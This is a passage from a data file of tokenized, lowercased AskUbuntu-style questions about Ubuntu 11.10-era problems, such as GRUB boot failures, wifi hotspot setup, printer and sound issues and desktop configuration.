2.6.38 for open-source mode-setting , xf86-video-ati/radeon 6.14.0 for 2d acceleration ( exa/xv ) , and mesa 7.11 for 3d acceleration . ''
105200	what is the difference between `` service restart '' and `` service reload ''	i 'm trying to understand the difference between service restart [ someservice ] and service reload [ someservice ] . i understand that `` restart '' restarts the service whereas `` reload '' reloads the configuration , but i do n't understand the practical implications of this well enough to determine which i should use in a given context . an example : most guides i 've read for setting up postgresql say that , once i 've edited postgresql.conf and pg_hba.conf to allow remote connections , i should issue sudo service postgresql restart . however , if i were guessing which to use based on the description above i would choose `` reload '' . in case it matters , i 'm on ubuntu 11.10 - though i 'm hoping for as generally applicable an explanation as possible .
105206	trust gxt18 keyboard not working ( hid_max_usages )	i 'm an owner of a trust gxt 18 keyboard that doesnât work with linux.. i 've read around the internet , that if i increase the hid_max_usages ( something to do with usb devices ) i could get it to work , so the question is : how can i increase it ? if you see another solution , please tell me , because i do n't want to mess around system commands unless if is the only way to get it working !
105208	installed fglrx . plymouth using text theme	my boot splash screen was fine with the open source drivers . i installed fglrx , rebooted , and it seems plymouth is using the ubuntu text theme . this seems to be my probleml why does plymouth boot in fallback text mode ? however , both my boot and shutdown use the text theme . i tried sudo update-initramfs -c -k all with no luck : -/
105209	windows vista crashing after installing via wubi	everyone , to start off , this is my very first question i have asked on askubuntu.com ; so here is my first question/problem . approximately 2 days after installing ubuntu 11.10 through the wubi installer while running windows vista ( 32-bit ) i have been experiencing occasional bsod when i have my windows os running . initially the first two i have no idea why my computer crashed , it was just on the desktop screen when it crashed after being left on for like 30 minutes . the most recent bsod was after i went to print a few documents using my printer while on windows vista ; as a side note , my printer was also added to the ubuntu os before i had started printing ( on the printer list ) . when that crash happened , the bsod screen mentioned the saying the printer driver of my printer . thanks for reading/answering my question .
105211	is lightdm is broken ? autologin works	i recently upgraded my mythbuntu box to 11.10 . lightdm worked for a while and then i configured autologin on my user account . after some time , i 've removed some packages to lean down the system . now when i log out ( from either unity or gnome shell ) i lose the x session , lightdm does n't start back up . if i disable autologin through /etc/lightdm/lightdm.conf i get no login screen & no x . as i said , autologin works and gives me a ubuntu classic desktop . this is the only reference in dmesg to lightdm ; [ 17.351023 ] type=1400 audit ( 1329530135.420:19 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm-guest-session-wrapper '' pid=1097 comm= '' apparmor_parser '' can anyone help ?
105217	how do i create a non-adhoc wifi hotspot ?	i wanted to use my desktop with a wired ethernet connection ( eth0 ) to operate my `` tp-link tl-wn722n '' usb wifi adapter ( wlan0 ) as a non-adhoc ( infrastructure mode ) access point for my android to connect to . after much searching , i finally found a method ( spread across many websites ) that does most of what i need ... dependencies : hostapd bridge-utils i modified `` /etc/network/interfaces '' sudo gedit /etc/network/interfaces to contain : # this file describes the network interfaces available on your system # and how to activate them . auto lo br0 iface lo inet loopback allow-hotplug eth0 iface eth0 inet manual allow-hotplug wlan0 iface wlan0 inet manual # bridge setup # for dhcp address iface br0 inet dhcp bridge_ports eth0 wlan0 # for static ip # iface br0 inet static # bridge_ports eth0 wlan0 # adapt with your network settings # address 192.168.1.250 # netmask 255.255.255.0 # network 192.168.1.0 # broadcast 192.168.1.255 # gateway 192.168.1.1 # dns-* options are implemented by the resolvconf package , if installed # dns-nameservers 192.168.1.1 # dns-search localdomain # # # reference # # # # creating a wireless access point with debian linux âť agent oss ( october 31 , 2011 ) # https : //agentoss.wordpress.com/2011/10/31/creating-a-wireless-access-point-with-debian-linux/ my `` /etc/hostapd/hostapd.conf '' ( which i somehow managed to put together myself ) sudo gedit /etc/hostapd/hostapd.conf contains : # # # guts # # # interface=wlan0 bridge=br0 driver=nl80211 # # # general # # # ssid=____________________ hw_mode=g channel=1 # # # security # # # macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 # # 0 visible # 1 hidden # # wpa=2 wpa_passphrase=____________________ wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp # # # reference # # # # # created tuesday , february 14 , 2012 # # ubuntu 11.10/12.04 # # # hostapd linux documentation page # http : //linuxwireless.org/en/users/documentation/hostapd # creating a network bridge on ubuntu ( january 16th , 2011 ) # http : //webserver.linuxportal.nl/ ? p=422 ( i 've edited out the security bits for this post ) all of that allows me to open up a terminal and execute : sudo hostapd -b /etc/hostapd/hostapd.conf to have a functioning access point that my android and all other wifi devices can connect to . aside from sharing this method with others since info for this setup is so sparse ; there are three problems that would be nice to fix : this configuration deactivates network manager and all of its functions . when you click it , it gives a `` device not managed '' message . ( not essential , but a bit annoying to me ) this method can struggle with ip addresses from time to time . i must use a terminal to turn on wifi . ( ok for me , but not family friendly ) . i figured out how to make a launcher using gksu and a simple script if anyone needs one ... ( why ca n't network manager do this out-of-the-box ? ? ) thanks in advance ! i hope all of this can help someone else ; i 've never written a tutorial before and know virtually nothing about networking ... perhaps related to network bridge - without destroying network manager ( among others ) . tested using ubuntu 11.10 , 12.04 .
105219	nvidia optimus , can i use only the integrated card through vmware ?	i am running ubuntu 11.10 through vmware worksation 8. when i run ubuntu , it runs in unity2d , and there are propriety drivers available . is this another optimus conflict ? and if so , how can i go around it if optimus does n't work in vms ?
105220	the home folder icon on the launcher will not open on unity	i have to usually open the home folder by pressing the super key , than typing home manually . it will work if i remove the icon from the launcher , then re add it . is there a way to fix that ? i am using ubuntu 11.10 with the unity desktop environment .
105222	cant log into hotmail	i am having the issue for about a month now , i used lubuntu and then switched to ubuntu ; it started with opera , i tried with firefox , chromium , chrome , etc. , the result is allways the same , i can not log to my hotmail account ; if i switch ti windows , then i have no issue at all , except with opera . any ideas ?
105224	ctrl + page down & & ctrl + page up	i use a macbook pro and am using linux mint . i know this is an ubuntu forum but mint is built on top of ubuntu so i am trying here . the macbook pro does n't have a page down or page up button . applications such as epiphany and terminal use these buttons to switch between tabs . ubuntu and mint both use apt so i assume all applications are the same if not extremely similar . you can not re-key-bind the terminal nor epiphany . so i tried the keyboard settings app and keyboard layout app to see if i could change the keys . this proved futile . what i want is either to rebind the keys in epiphany and the terminal , or bind page up and page down to something else .
105226	what does this python2 error mean , and what should i do about it ?	disclaimer : i 'm running arch linux , not ubuntu , but that should be irrelevant , or if it is n't i should be able to translate from apt to pacman . whenever i attempt to use an application relating to python2 ( gnome-tweak-tool , bzr , etc . ) it fails to start and , when run from command-line , i get this error : [ username @ host ~ ] $ gnome-tweak-tool traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 563 , in < module > main ( ) file `` /usr/lib/python2.7/site.py '' , line 545 , in main known_paths = addusersitepackages ( known_paths ) file `` /usr/lib/python2.7/site.py '' , line 278 , in addusersitepackages user_site = getusersitepackages ( ) file `` /usr/lib/python2.7/site.py '' , line 253 , in getusersitepackages user_base = getuserbase ( ) # this will also set user_base file `` /usr/lib/python2.7/site.py '' , line 243 , in getuserbase user_base = get_config_var ( 'userbase ' ) file `` /usr/lib/python2.7/sysconfig.py '' , line 520 , in get_config_var return get_config_vars ( ) .get ( name ) file `` /usr/lib/python2.7/sysconfig.py '' , line 419 , in get_config_vars _init_posix ( _config_vars ) file `` /usr/lib/python2.7/sysconfig.py '' , line 287 , in _init_posix raise ioerror ( msg ) ioerror : invalid python installation : unable to open /usr/bin/lib/python2.7/config/makefile ( no such file or directory ) i checked /usr/bin/lib/python2.7/config/ and it is empty .
105229	my os disappeared ( win7 ) on acer aspire lap top including boot file	okay , i 'm obviously an extream novice with computers no matter what os ! so whoever responds to my question must be patient & take it easy on me please . ( okay ) this is what happened misplaced my windows bios password while moving . along with my windows logon password . then had the 4 gig of ram stolen out of it . when i finally started to address all these issues , i first went to staples and bought 2gig of ram compatable with the acer aspire 5552-3691 . that 's all i could afford . tried to get past the bios password to no avail . as i was frantically trying to fix this , in a exhausted state at 3am , i hooked up a 500gb seagate usb drive thinking i had made a back up on it . had to leave next day and forgot it was running . i think it removed everything . long story short , a friend of mine tried to make a boot disk . he could'nt get it to boot . then i remembered a few years ago when i could n't boot a sony vio lt , that ubuntu 8.04 installed creating its own boot file and ran great . so he downloaded ubuntu 11.10 and installed it . problem is when it boots it takes me to a screen that only accepts ubuntu commands . i have no idea how to get to a browser or load the laptop drivers and the commands i tried for 4 hours last night would not work . had no access to internet . i have some severe health issues and is hard to comprehend seemingly hundreds of instructions to make this work . last time i installed ubuntu it seemed to do most of the configuring for me . i do n't know what i 'm doing wrong but someone please help me ! ! ! i 've downloaded several types on cd 's and some on dvd . i think most were live disks . do i uninstall what did go to hd . can i do remote desk top with someone who knows what they are doing , in this limited state . thank you in advance ! ! ! ! someone ? ! ! ! please ! ! ! !
105230	some fonts are not anti-aliased when used over hdmi	i have searched around and have tried various suggestions that are posted , however i can not get this fixed . my computer is hooked up through hdmi to my 1080p monitor and the fonts in chrome , firefox and various other programs look bad . other places like the desktop the fonts look good . i think it is an anti-aliasing problem . the fonts look fine if hooked up through rgb however . i have tried removing the ~/.config/dconf/user and tried changing the font rendering and hinting . i have a radeonhd 5450 and have used both open source and fglrx drivers . i am running ubuntu 11.10 . you can see from the screenshot , the software center fonts are clear , however the browser fonts are not sharp . this is not limited to the browser . can someone point me in the right direction , i have been dealing with this for sometime now .
105232	with keybinding , compiz can start a program using hot key , but non-auto-focus	in compizconfig settings manager â general â commands , i set control + alt + t to run lxterminal ( i use lubuntu , the hot key works well before installing compiz , but after compiz works , i found the hot key does n't work with it , so i have to rebinding it with ccsm ) , everything seems fine . but when i open the lxterminal using the hot key , i found the new lxterminal window did n't get focus , and i have to click the window manually to let it get focus , which is very inconvenient . can i let lxterminal get focus automatically when starting it with hot key ?
105233	how to remove the menu in the top panel ?	the old menu of archive , edit etc . is behind the gnome-shell panel and it 's very annoying . how do i remove this menu in the top panel ? i 'm using ubuntu 11.10 by the way . here is the problem . i hope someone can help .
105240	read/write errors on shared ntfs	well , i suppose 'errors ' is not the best way of putting it , but anyway . due to the usage of my computer , i have set it up to dual-boot windows 7 and ubuntu 11.10 . windows is in it 's own partition , ubuntu and it 's swap partition are sharing a logical partition , and i have 3rd partition formatted to ntfs which is shared between the two operating systems . however , this seems to introduce a fair few strange occurrences . the issue of nautilus being unable to send files to the rubbish bin ( which i am yet to find a definitive answer t ) is one , as well as having gigabytes of data disappearing from the drive as if it never existed in the case of the latter , i transferred ~20gb of files onto the partition from an external drive . several hours later i needed to briefly boot windows ( which had been hibernating ) . while in windows i went to move a few more files across , to find the original files had completely disappeared . this was still the case when i returned to ubuntu any help is appreciated
105241	one pixel 'grab ' area when resizing windows	i find it far to hard to grab the top edge of windows to resize them . it seems like there is only a 1 pixel range where the mouse cursor changes to the resize icon . does anyone know if this range can be increased ? the grab area in the bottom right corner for instance seems to be a lot bigger , like 20pixels .
105246	dual boot problem	i have windows 7 install already an later on i installed ubuntu but after installation and reboot it was n't showing dual boot option . i 'm a totally new user can anyone guide me quickly on this .
105247	can i install glib 2.30 on 11.04 ?	can i install glib > = 2.30 on ubuntu 11.04 ? i mean this package from above link
105250	switching my vm base memory for win xp from 192mb to 512mb when i have 2.7gb of ram okay ?	do you think that me using 512mb of ram for my vm base memory with windows xp when i am running 2.7gb of ram is okay ? or should i return it back to 192mb ?
105253	how to start evolution in a specific folder ?	having a problem with evolution ( 3.2.2 ) . when evolution starts , it opens the last folder i 've used . how can i set that it should open alwaays the inbox after start ? could n't find any settings . thanx in advance . w .
105256	how to make packages cross different ubuntu release ?	i 'm the author of some software , which depends on libxx6 ( in ubuntu 11.10 ) , but in 12.04 , the package become libxx7 ( 7 is not a ubuntu version number ) , so the dependency become a problem . how can i work this out ? i 'm managing a ppa , and i want to fix that before release of ubuntu 12.04 . thanks !
105261	not able to change flash settings	my gnome crashes constantly when i open web pages containing flash so i tried to turn off the hardware acceleration . i opened the adobe flash player settings panel but found that the buttons are not clickable . i can still switch between display/privacy/storage ... panels using tab and enter key . but for others like the `` enable hardware acceleration '' checkbox this wo n't work . anyone knows how to solve it ?
105262	creating an ubuntu network for dummies	i want to hook the two ubuntu computers together vie an ethernet cable . i would like to access both via one monitor and keyboard . is there a quick and easy way to do this ? what are my ubuntu options ?
105263	ubuntu 11.10 wo n't boot on dell xps 8300	i have a brand new dell studio xps 8300 desktop with 17-2600 cpu , h67 chipset , 8gb ddr3 , 2 1tb hdds in mirrored raid , and amd radeon 6770 . dell does n't support ubuntu here in australia so it came with windows 7 and windows software . yes i had to pay for an o.s . and software i did n't want to get hardware i did want , all at a greatly inflated price . it 's not all beer and skittles in the land of oz . i changed boot priorities in the bios to dvd and ran ubuntu 11.10 64bit from the iso with nomodeset . the installation reformatted all partitions to rid me of the dreaded windows . all was well until until reboot . the bios does its thing , then its `` the black screen of death '' with a blinking cursor ; no boot screen , no grub , no keyboard , no mouse . i 've searched dell and ubuntu forums in vain . can you help ? i would be really grateful for any advice which can help turn my big expensive paperweight into a really useful machine . thank you in anticipation kind people . phil
105265	how to make use of runtimeservice in ubuntu under uefi boot mode ?	how to make use of runtimeservice in ubuntu under uefi boot mode ? i want to make use of the runtimeservice of uefi bios , setvariable ( ) or getvariable ( ) , and so on . what i need to do , and any lib for it ? please help , thanks a lot !
105266	upstart jobs and init.d scripts not launching	i 'm working on an ubuntu based browser distro that is meant to be ran live . part of the security solution is to use sdmem when it shuts down . sdmem wipes the available ram and is found in the package secure-delete in ubuntu repos . sdmem is not being called in the scripts below . i 've had this solution working for another project set up the same way , so i know it works . but sometimes in the other project on shutdown and restart i did n't always get the standard out that sdmem gives when wiping . ( normally sdmem spits out a bunch of asterisks . ) i 've disabled graphical plymouth so i can look for the output . here is my script info : internet @ linux-surfer /etc/init.d $ cat dram.sh # ! /bin/sh # give this script permissions : # chmod +x sdmem.sh # sdmem will delete data which may lie still in your memory ( ram ) # the secure data deletion process of sdmem goes like this : # * 1 pass with 0x00 # * 5 random passes . /dev/urandom is used for a secure rng if available . # * 27 passes with special values defined by peter gutmann . # * 5 random passes . /dev/urandom is used for a secure rng if available . sdmem -fllv sdmem -fllv sdmem -fllv sdmem -fllv sdmem -fllv sdmem -fllv sdmem -fllv sdmem -fllv sdmem -fllv # this script need to be added to shutdown this way : # sudo cp sdmem.sh /etc/init.d # sudo ln -s /etc/init.d/sdmem.sh /etc/rc0.d/k11dram.sh # sudo ln -s /etc/init.d/sdmem.sh /etc/rc6.d/k11dram.sh permissions : internet @ linux-surfer /etc/init.d $ ls dram.sh -l -rwxr-xr-x 1 internet internet 743 2012-02-18 00:31 dram.sh upstart script : internet @ linux-surfer /etc/init $ cat dram.conf start on runlevel [ 06 ] script sdmem -fllv end script internet @ linux-surfer /etc/init $ permissions : internet @ linux-surfer /etc/init $ ls -l dram.conf -rw-r -- r -- 1 root root 55 2012-02-18 01:35 dram.conf
105267	gnome shell dual monitor issue ( minor )	i am experiencing a minor issue with gnome shell and 2 screens . i 'll do my best to explain it : both screens work the way i like , no issues with that . but , screens appear to be few pixels to the right meaning that i can just see right edge of the screen on the left side . the problem is n't critical , but having a fix would make it look better . thanks for replies already in advance , lassi
105268	utorrent 3.1.2 via wine - > black background of main panel	as utorrent for linux is horrible , i use windows versions via wine . but when i start it i get a windows like on the image anyone knows how to remove this black background from the main panel ?
105271	`` dpkg -l '' does not see any available package	i do n't understand why if i type dpkg -l mutt , i obtain no packages found matching mutt . however mutt is there and can be installed by sudo apt-get install mutt as far as i know dpkg ( on debian ) should list every package , installed or not , giving information on the package status .
105273	how to upgrade to cinnamon 1.3 released recently ?	i am on xubuntu and want to install cinnamon 1.3 which got release recently . currently there are no ppas for 1.3 . webupd8 says to download muffin and cinnamon packages from cinnamon 's website . doing that couldnt bring up cinnamon i.e . after the login prompt , cinnamon does n't load up and it falls back to login screen . any help ?
105275	bad quality video dvb-t mpeg4 after a few minutes	i have a problem with mythfrontend in oneiric installed from mythbuntu . i can not watch tv after few minutes because of lots of artifacts . i have a hauppauge 1300 dvb-t tuner and mpeg-4 compression is used . signal is ok because i can watch in vlc wihtout problems . there are in logs many entries like : 2012-02-16 20:20:10.693 [ h264 @ 0x4430bb40 ] missing reference picture 2012-02-16 20:20:10.704 [ h264 @ 0x4430bb40 ] mmco : unref short failure 2012-02-16 20:20:10.704 [ h264 @ 0x4430bb40 ] mmco : unref short failure 2012-02-16 20:20:10.704 [ h264 @ 0x4430bb40 ] illegal short term buffer state detected 2012-02-16 20:20:10.796 [ h264 @ 0x4430bb40 ] illegal short term buffer state detected it can be a ffmpeg issue but how to install current/updated ffmpeg that will meet mythbuntu dependencies ?
105289	how to kill compiz that wo n't die ?	i believe the problem may be related to this question . i logged twice to guest account . the first time i 've chosen unity and something went wrong . the other time i used gnome shell , it worked for a while , and then i switched to my regular user . i have n't rebooted since . after a few hours i noticed that there are two compiz processes runing using 100 % cpu , so i tried to kill them . htop output screenshot thanks to people on the ubuntu 's irc chat i tried : sudo killall compiz sudo killall -9 compiz sudo pkill -9 compiz sudo kill -9 15384 none of this commands killed the process ( but all of them return 0 ) . i 've also tried restarting x server with /etc/init.d/lightdm restart . this answer talks about how it may not be possible to kill a process in uninterruptible sleep . i believe that 's not the case -- the s column is representing state and the r symbol means `` running '' . this answer tells me that there are some system processes impossible to kill , and their names are in brackets . that 's not the case : ps ax output screenshot . bc81 on irc linked me this answer , and suggested that it may not be possible to kill unity when the launcher or unity processes are running . they do n't seem to be running though ( checked with sudo ps ax | grep -i launcher ) .
105300	theme tab in gnome-tweak-tool	under 'theme ' tab in gnome tweak tool i have two different drop down menus : gtk+ and shele theme . what is the difference between the two ? and another question : i 've just installed a new theme but now i want to change the font on buttons so that its not white . how do i do that ? thanks !
105309	how to stream hdmi input to a desktop window	is it possible to stream a hdmi/dvi input into a window and not to the whole monitor/screen area ? i 'm developing some application for a pandaboard running the linaro distribution ( linaro is ubuntu for embedded devices ) . i have it working perfectly , login to the full desktop environment with the gnome ( unity 2d ) and everything . usually i connect to it via ssh or rdp and that does perfectly the job ; or i have a monitor connected to the board 's hdmi output , keyboard and mouse directly to the board . but sometimes : i do not have a network connection or i want to bypass completely the usage of the network ( so no direct connection setup possible ) i do not have another monitor available so i would like to be able to use my laptop , on which i run ubuntu , to see in a window on my desktop the output from the board 's hdmi port .
105310	printers get signal - but why do n't they print in 11.10 ?	( refers to ubuntu 11.10 oneiric ) i set up a printer connected via usb ( canon mp630 ) and a network-printer ( brother hl-2030 via fritz ! box 3270 ) . when i try to print something the files get sent to the printers ( ubuntu says so ) and the printers get activated : they wake up from standby ( if so ) and ( canon ) show a message `` start printing '' resp . ( brother ) sound like they would start printing . but two seconds later everything stops and nothing happens anymore . ubuntu said everything got printed . how can i solve the problem and print again ? how to gain more information of the process ? everything worked well in ubuntu natty 11.04 . and it might be of interest that it is no problem to scan anything with canon mp630 , as well as i recieve status-messages . edit : i deleted both printers again , rebooted and installed them newly . now it works partly : ( brother hl-2030 ) i used to choose the original brother-ppd when it did n't print . when i took the ubuntu-recommended one i now can print , but ca n't configure all the options i was used to configure ( i. e. sleep-time ... ) ( canon mp630 ) i can print now , but it is totally messed up : it prints 1mm-lines of colour and between each line is a blank line . so it prints only the upper part of an image and at all it looks pale and stretched .
105312	how do i configure 5.1 audio ?	i have 5.1 audio system and i have on board sound ac 97 ( in windows i install soundmax for this ) , in ubuntu i have configured this 5.1 audio . all the channels are working fine , the problem is my rear right is replaced with center channel and center channel is replaced by rear right , the sub-woofer is making better sound than windows but when i run the sound test it says rear centre for the subwoofer , i 've test many ways but could n't correct it . is there a way to hack any file and correct this , plz can anybody help me , i am a newbie for linux ( ubuntu 10.10 installed and working , no problems with sound on 11.10 ! )
105313	i can not watch some videos after upgrading to flashplugin	after upgrading to flashplugin , i can not watch videos on the internet . i also can not watch some other youtube videos . i 'd say it 's a bug in gnash , any ideas ?
105314	how to backup user files automatically via rsync ?	i need to take incremental backup of users files which is located in the following location automatically using a cron job . could anyone explain the procedure to take backup using rsync in detail pls ? location : /home/user1/desktop/ note : the backup should be saved as follows , if the system ip is 172.29.36.10 the backupfile should be named as user10 and so on . how to acheive this ?
105320	can not upgrade from 11.04 to 11.10	i do not have the option to upgrade to ubuntu 11.10 in my update manager window . so far i have changed the source from the united kingdom server to the main server and have the normal releases option selected . i have n't seen many other answers to this problem . can someone please give me some advice ?
105322	install problem ( ubuntu server 10.04 ) with usb as it reboots when i hit 'enter ' for 'install ubuntu server ' option ! help	we can not seem to install ubuntu server with usb as it reboots when i hit 'enter ' for 'install ubuntu server ' option . my friend wants to try setting up a server so ; we downloaded ubuntu server 10.04.4 we created a boot cd and installed ubuntu server no problem at all . but then the problem arose the hardrive we wanted to use is a 1tb sata drive and the computer orginally has 40gb ide . so i bought a sata to ide and ide to sata converter from : http : //www.microdirect.co.uk/home/product/52926/ide-to-sata-converter -- -converts-ide-hdd-to-sata-inc-sata-data-and-power-cables unfortunately this converter means i can not plug in the ide cable meaning i only have one ide connection i.e cd drive has to be disconnected for the 1tb sata hardrive to be connected . so now the 1tb drive is connected , powered it on opened the bios to make sure the hdd appeared it did as st3asdapfkg ( somthing like that ) . fortunately the computer supports usb booting , so i read ubuntu server usb install instructions i tried : startup disk creator & unebootin startup disk creator made the usb bootable with the 'ubuntu-10.04.4-server-i386.iso' all looked fine stuck the usb drive in , booted the machine up and i am quickly presented with ubuntu language choice . i hit enter to select english then i am presented with : install ubuntu server , install ubuntu enterprise cloud , check disk for defects , test memory , boot from first hard disk , rescue a broken system i can move up and down the menu fine everything seems ok , i select 'install ubuntu server ' , computer just hangs and screen either goes blank or locks . so i rebooted the computer loads the same menus fine , i select 'install ubuntu server ' hit 'enter ' and the computer just restarts then brings me back to the same menu . hmmm then i tried choosing the rest of the options separately : install ubuntu server , install ubuntu enterprise cloud , check disk for defects , test memory , boot from first hard disk , rescue a broken system computer just restarts and back to the same ubuntu menu every-time . grrrr at this point i wish i actually new how to command line install or something but i do n't have a clue how to do that . so i tried hitting 'f6 ' for 'other options ' and i tried them all in various combinations and individually . no luck : ( expert mode , acpi=off , noapic , nolapic , edd=on , nodmraid , nomodeset , free software only ) at this point i am wondering if it is a bios setting causing problems , i tried turning every option in there on off that i do n't understand . no luck . i then discovered by accident if you hit esc in the ubuntu install menu it says `` you are leaving the graphical boot menu and starting the text mode interface '' i hit 'ok ' . next a prompt pops up saying 'boot : ' one time it responded when i typed somthing with ' can not find kernal image ( something like that but since then it just restarts when i hit enter in that prompt ) . i had a browse on the net and found someone suggesting removing quiet from install command for 'install ubuntu server ' . made no difference at all just reboots ... orginal boot options noprompt cdrom-detect/try-usb=true persistent file=/cdrom/preseed/ubuntu-server.seed initrd=/install/initrd.gz quiet -- modified boot options noprompt cdrom-detect/try-usb=true persistent file=/cdrom/preseed/ubuntu-server.seed initrd=/install/initrd.gz -- still i can not install ubuntu server by usb as it , reboots when i hit 'enter ' for 'install ubuntu server ' option . this is a real pain as we can not take the 1tb sata hardrive and swap it for ide to be able to use the cd drive . why is is it so hard to install ubuntu server with usb ? i have wasted a full day and half on this really frustrated any help would be amazing ! i know the answers out there just seems a bit illusive at the moment ! computer spec- asus motherboard , 1gb ram 2x512mb , powersupply 200watt , 2.8ghz processor intel , on-board 64mb graphics , 100mb ethernet , 54mb wireless ,
105327	how do i stop the battery from charging ?	i have a dell inspiron 1545 and i have ubuntu 11.10 , and in my dell laptop it allow me to discharge the battery when i am using the power cable and that helps in the life of the battery , and i used to do that in windows . the shortcut to activate it is ( fn ) + ( f3 ) but when i use it in ubuntu it shows : ac adapter laptop battery processor and nothing helps in what i am looking for . what can i do ?
105331	binding capslock key to a shell script	a linux newbie here ! i own a netbook which does n't have any indicator leds . so i decided to write a small shell script that would notify me when the capslock key is pressed . the script goes something like this : # ! /bin/bash state= $ ( xset -q | grep caps | awk ' { print $ 4 } ' ) if [ `` $ state '' = `` on '' ] then notify-send `` caplock : on '' fi now i want to bind the script to the capslock key so that it gets executed everytime i press the key . but the keyboard shortcuts setting expects a key combination . is it possible to bind it to just the capslock key ? ? thanks in advance !
105333	grub problem - command prompt	update : thanks to all who helped . i gave up and am going to re-install . not the end of the world , no files will be lost : - ) this time will be backing up grub haha . thanks again , i really appreciate the community 's help on this . i was going along fine when the new pae kernel came down , and it had some bug where the sound was all messed up . so i used startup manager to choose the older pae kernel and rebooted . but startupmanager must have fuxxored my grub . when i re-booted , i get thrown directly into memtest and thats it . i tried to re-install grub using the live disc method that i found in many places . that changed something so i get a prompt and the message : `` gnu grub version 1.99 ubuntu . minimal bash-like editing is supported . type help for complete list . '' but then i tried the live cd fix again and now am back at the memtest ... what can i do to get my system running again ? update : just to be clear , when i start up i get a blinking cursor in the top left , and the word 'on ' in the middle of the screen . then , after a good minute or two , the memtest starts .
105335	how do i move a window when two-finger scroll is enabled ?	i just installed ubuntu 11.10 on my macbook pro , and i have enabled two-finger scroll . now i 'm unable to move a window with the trackpad , which is usually done by click-and-holding the window title ( with one finger ) and dragging ( with another finger ) . how do i move a window without disabling the two-finger scroll ?
105336	set terminal window size ( and position )	i use lubuntu and want to set bigger terminal window ( for default ) . how can i do that ? maybe in lxterminal.conf but how ?
105339	german keyboard configuration : `` strg + alt '' -shortcuts does n't work	since 1 hour i 'm a proud ubuntu user . but there is a problem , i 'm not able to solve : the `` strg + alt '' shortcuts does n't work ( for example `` strg + alt + q = @ '' ) . i checked all german keyboard configurations i can choose from with no success . i have the problem with every application . alt gr does n't work either . please help me , because i want to be a happy ubuntu user . thank you ! !
105340	ubuntu on asus eeepc vx6s ?	does ubuntu 11.10 works on asus eeepc vx6s ? does all of the features work or what does n't ?
105351	toshiba satallite c660 - problems with fan	i am using a toshiba satallite c660 . i am using ubuntu 12.04 ( latest build ) . i have problems with my fan , sometimes it runs , than not . i dont understand why . i already looked at the celsius for the processor cores , they run normal ( always under 60 celsius ) . i wanted to use toshset to control the fan by myself , but it outputs : required kernel toshiba support not enabled . do you know how i can get the module in form of a package for 12.04 ( amd64 ) ? or do you know an other way ?
105352	how to add a specific application in gnome-pie ?	all i want to do for now is just adding the terminal in gnome-pie applications . the thing is , i do n't even know what should i type in `` command to execute '' path . someone figure me out please .
105356	windows safe mode in grub menu	is it possible to place windows safe mode into the grub menu ? if so , what is the script for it ? ( i am currently running windows xp and ubuntu 11.10 . i also have the grub customizer installed . )
105359	how do i enable osx-like three-finger swipes in 11.10 and 12.04 ?	in macosx the default settings is to move back/forward a page in firefox when i do a three-finger swipe left/right . in unity , three-finger-swipes invokes window movement . how can i configure trackpad swipes ?
105360	i have a toshiba satellite a205-s6812 and the sound is not working .	i made sure sound was up all the way . its not locating the drivers for it , i was wondering if anyone knew what to do to fix this problem , anything is helpfull i 'm stumped on it . if anyone has any sugestions or a solution to my poblem i would love to hear it . thank you all
105361	cairo-dock icons degrade to question marks over time	in an up to date 11.10 the cairo-dock icons gradually become blue ? circle icons after a few hours or days after restart . the launchers still work when clicked , but they become harder to identify as more and more of them `` forget '' their original icon . any workarounds to periodically refresh the dock or fixes ?
105366	how to check if dns is encrypted ?	i have installed dnscrypt , its opendns encrypted dns patch for ubuntu & other linux users & it 's working fine . how do i know if my dns is encrypted ? i have googled but did n't find anything . status one @ onezero : ~ $ status dnscrypt dnscrypt start/running , process 1013 one @ onezero : ~ $ sudo netstat -atnlp active internet connections ( servers and established ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.2:53 0.0.0.0 : * listen 1013/dnscrypt-proxy updated wireshark @ alvar without dnscrypt
105369	why ca n't i see the image changed with grub customizer ?	i installed grub-customizer to edit the boot-screen . it works so far ( i. e. for timeout ) , but changes concerning the background image ( and maybe font styles , too ) are n't applied . i placed the image in /boot . how to improve that ? this is what /etc/default/grub says : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' ubuntu , mit linux 3.0.0-16-generic '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 3 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash nomodeset video=uvesafb : mode_option=1280x1024-24 , mtrr=3 , scroll=ywrap '' grub_cmdline_linux= '' splash vga=795 quiet '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode= '' 1280x1024 '' grub_gfxpayload_linux= '' 1280x1024-24 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_savedefault= '' false '' export grub_menu_picture= '' /usr/share/backgrounds/warty-final-ubuntu.png '' export grub_color_normal= '' dark-gray/black '' export grub_color_highlight= '' white/black ''
105374	ca n't use keyboard in warcraft3 - playonlinux	i installed playonlinux to play warcraft 3 but when i come to the first screen of warcraft3 , i ca n't type anything . i mean the keyboard does n't work . what 's the problem ? in
